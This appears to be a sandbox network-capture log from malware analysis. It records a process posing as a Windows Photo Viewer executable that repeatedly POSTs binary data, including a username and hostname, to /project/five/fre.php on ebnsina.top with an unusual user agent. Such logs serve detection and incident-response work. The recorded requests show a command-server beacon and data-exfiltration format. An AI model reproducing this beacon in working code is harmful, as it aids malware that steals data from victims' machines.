Apr 3, 2024 06:37:56.348131895 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KEc9O8Z8kmDVBjK197iVszJVR3lz9%2FbQX25FVsA3jGTHAq7eFU0Nao4sMh%2F7Cm34%2FmeEj13rK1UMuOsNAuxtoKHX5wm120dbFylZCnqz7l0aRvCRy0dDmfKDJtQiEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dc01db767e4-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49779	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:56.609631062 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:56.734040976 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:57.166856050 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tUS3q3Gr7%2FDBorQhlnU6bFF7LW34FKzO3tAwyvxRAIaqCb4LjAe%2FN1HCT0LoRf72HgiGIV8wTAo0MHLsFHrBEm1YJ4XdEeFvlSmzq%2FV8SWlwmi2vIQiogkf9%2Bin2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dc53d9db3bc-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49780	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:57.435446978 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:57.562799931 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:57.862072945 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ivi58ITgj%2FMTTcLX5O7%2FWltbpBtVAzZ46499bH9bhI4xmt8au6R9aDZF64YqcU3CvEwdF%2BnkmZspxfSDyVhfpfzZVe5fhhOAk8S%2B0bIIEY26N4QKM1UuMe7eapvU8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dca5ccc21df-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49781	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:58.122430086 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:58.247253895 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:58.551086903 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JbSfvcEqQawfIoyG4L4GreI2F0M%2FzjsXo3tH4PQTPiaSQvEj57oKVP84Ue94zKvJCmXtnOFlhWj3gleaZd8oAsji9i320Pd2YdizK4w%2FrugkHwYm3vREpqoYfmuziw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dceaf889aec-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49782	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:58.810148954 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:58.934648037 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:59.368338108 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtOqTCa6YMQv%2B0h618jpsRPdoOxXzVilhky8YjlPA1Jb8UTBL7qfBPOw%2FqfT5kjLrUAE%2FcylETFRSG1ae%2BOKcw3jE65kvQ6gtJLdaY584xVcFKVkfqrrBaCHgedPXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dd2f86adb29-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49783	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:59.640455008 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:59.765212059 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:00.062184095 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhshxCvq%2FiH3Cz%2Fqb7gAPl4tFlV9APfg%2BVFXpGv8u14BaHICjC1LvS20h8TkgnD9u2CGtnevgnSV02pSjcYDAzMXcqXr7X1PONSomTsSBj16DiqyrcwBLep4stQfRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dd82d6867db-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49784	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:00.331065893 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:00.456084967 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:00.744595051 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxPVVTQOY5qrj9bG5i68VVaHfqOkyC64g%2BUjKkY%2Bt8BvfbuCXLfiO7bfQaCrl2PQFT6s9yDCGyYUteAxUM8krGDvKJ%2B9G6D4JvWBsqk534Cal6wMduWjVdVgqyHNNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ddc7e0a0291-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49785	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:01.015338898 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:01.140033960 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:01.575891972 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhPJiKl1fEAhnd6Y1TMmF1EMZ3Bs%2FDA5RAY%2B89sZ2lFyTz%2B%2BtuFdbQPEl5gptyp0veBfSaPgbMe1RogakY2nlTdlMNRcEpaUqZz0uOSC%2BDCUobUJx3pZyXn8IyWokw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65de0b90c8dfa-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49786	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:01.844435930 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:01.969675064 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:02.272619963 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbdHTfB9aEbYdOHtdX0wzmczRt7mierOqjmg2xTdnplXW7U6BzaSI2GJyf8k2ApP0UtFVis0TPFWpAijExYAjWpMrARGnu8YUycgSKWbjb0bw9gI0NHJqo8rE5%2BRKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65de5eb525c6f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49787	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:02.546391010 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:02.671345949 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:02.965898991 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qz%2BGQVaFRWcSYxnpH6BojqXsgNeOwTOLf421R2cKiFRQsJToTP5qxhA4DiDZZyKBpvDyOAkW%2F%2FJXg6iu3yyhPfhc2zuOvV2wXzAr3Ajby6FXKsH6j72rNzkd9ujPVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dea4eec74b8-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49788	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:03.254673004 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:03.382950068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:03.684485912 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JSrm6YwxY%2Bw9vCD%2BoDL8Z1miZjY%2BN8Dw1mpB%2BsagWNf6254Dqc%2BI9UWirDrWjjg9jghgnWdhvauUg%2FbK0IIaXLbCFbAVq0Sx3V2Ul3hE9o6Xe4vzM7l2greZynWr6Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65deecfc43347-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49789	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:05.256072998 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:05.380669117 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:05.674985886 CEST	633	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Dj0gAmUt37AXLsa9f8bmrRoWfvI8wZc98vPCG%2FKnhejfy%2FYuzW2G%2BPD%2BK8AQ1YdL8PwTTHJqvDDJYm8qzEsAWwL%2B61v3%2Fl8sRkZpoWiD0XsYMTF6D%2FVj%2FSOlZYmGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dfb385367c8-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49790	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:05.938499928 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:06.063873053 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:06.362993002 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKJ7O65dgjpnGcGgTOYlJlfDk4FXlMBDerK1ILYwMeaSlIQfxtt9kfwjDciPp71PAKuNAUCOowAVjVbrd429PbOeKne3zDeCHdKa7SuS1ZYjzOfTsYf%2B2HjI43IVAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65dff8fce3370-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49791	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:06.650554895 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:06.774986982 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:07.077550888 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wf%2FSAobO4EIdsewj5BZLWovACDV1ftGsT0PIetGQGdcZ%2Fbi3FTf8juMfZMfv9PUGRdjijhd%2BfY0%2FHWdGcTTnPu%2FRZDZAg5n3ZAmleWgPyRZWCexIJSoulsP1mdGymw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e03fbce25af-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49792	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:07.360241890 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:07.484905958 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:07.923548937 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Y9cMvplFJOYWFleLcwJoWx1aG0BThZVVnZI9STh1msVYr3nMtpzQnOgoYUOVBu%2FhBk61tDEnlx3dxHLUOg8OocGlJW1%2BOpyNLSD4Ad9rKj3X1J3gak8E04RKmjhRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e0869fb0a2e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49793	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:08.198877096 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
